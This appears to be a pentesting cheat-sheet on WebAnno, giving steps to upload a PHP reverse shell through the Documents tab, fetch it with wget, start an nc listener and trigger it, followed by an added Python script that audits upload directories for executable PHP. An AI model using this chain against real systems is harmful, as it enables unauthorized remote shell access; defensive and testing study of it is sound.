WebAnno Pentesting

Last modified: 2023-01-24


WebAnno is a web-based annotation tool for a wide range of linguistic annotations. The server uses port 8080.

Default Credentials


Reverse Shell

If the target system opens the website associated with the WebAnno service, we can execute a reverse shell by uploading the payload and accessing the web page that hosts the payload.

1. Go to the Upload Screen in Dashboard

  1. Login
  2. Click “Projects”.
  3. Select the project in the left pane.
  4. Click the Documents tab.

2. Prepare Payload

WebAnno allows us to upload arbitrary file formats, so we can upload a PHP file for a reverse shell.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
vim shell.php

# Edit $ip and $port in editor.

Then start a listener on the local machine.

nc -lvnp 4444

3. Upload the Payload

In the WebAnno dashboard, upload the PHP file on the Documents page.

4. Access the Payload File on Another Server

For instance, when we access http://sub.example.com/path/to/shell.php, we get a shell in the local terminal.
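
Added example, not part of the original page: from the defender's side, the chain above depends on a file stored through the Documents upload ending up where a PHP-enabled web server serves it. The Python below audits a directory for files that could run as PHP, by name or by content; the directory being audited, the extension list and the sample files are assumptions constructed for illustration.

```python
import os
import tempfile

SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}  # assumption: extensions your server maps to PHP
PHP_TAGS = (b"<?php", b"<?=")

def classify(path, sniff_bytes=65536):
    """Return the reasons `path` could run as PHP; an empty list means none."""
    reasons = []
    # Check every dot-separated part: with Apache AddHandler, "x.php.txt" can still run.
    hits = sorted(set(os.path.basename(path).lower().split(".")[1:]) & SCRIPT_EXTS)
    if hits:
        reasons.append("extension:" + ",".join(hits))
    try:
        with open(path, "rb") as fh:
            head = fh.read(sniff_bytes).lower()
    except OSError as exc:  # unreadable files are reported, not silently skipped
        return reasons + ["unreadable:" + type(exc).__name__]
    if any(tag in head for tag in PHP_TAGS):
        reasons.append("content:php-open-tag")
    return reasons

def audit(root):
    """Walk `root`; map relative path -> reasons for every flagged file."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reasons = classify(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings

def demo():
    """Audit a constructed document store (sample files are made up for this example)."""
    samples = {
        "corpus.txt": b"The quick brown fox.\n",
        "shell.php": b"<?php echo 'constructed sample'; ?>",
        "notes.php.txt": b"plain text, suspicious name\n",
        "annotations.tsv": b"token\tlabel\n<?php /* constructed */ ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, data in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        return audit(root)

if __name__ == "__main__":
    print(demo())
```

Point `audit()` at the directory where uploaded documents are stored or synced; any finding there means the upload path and a script-executing web root overlap.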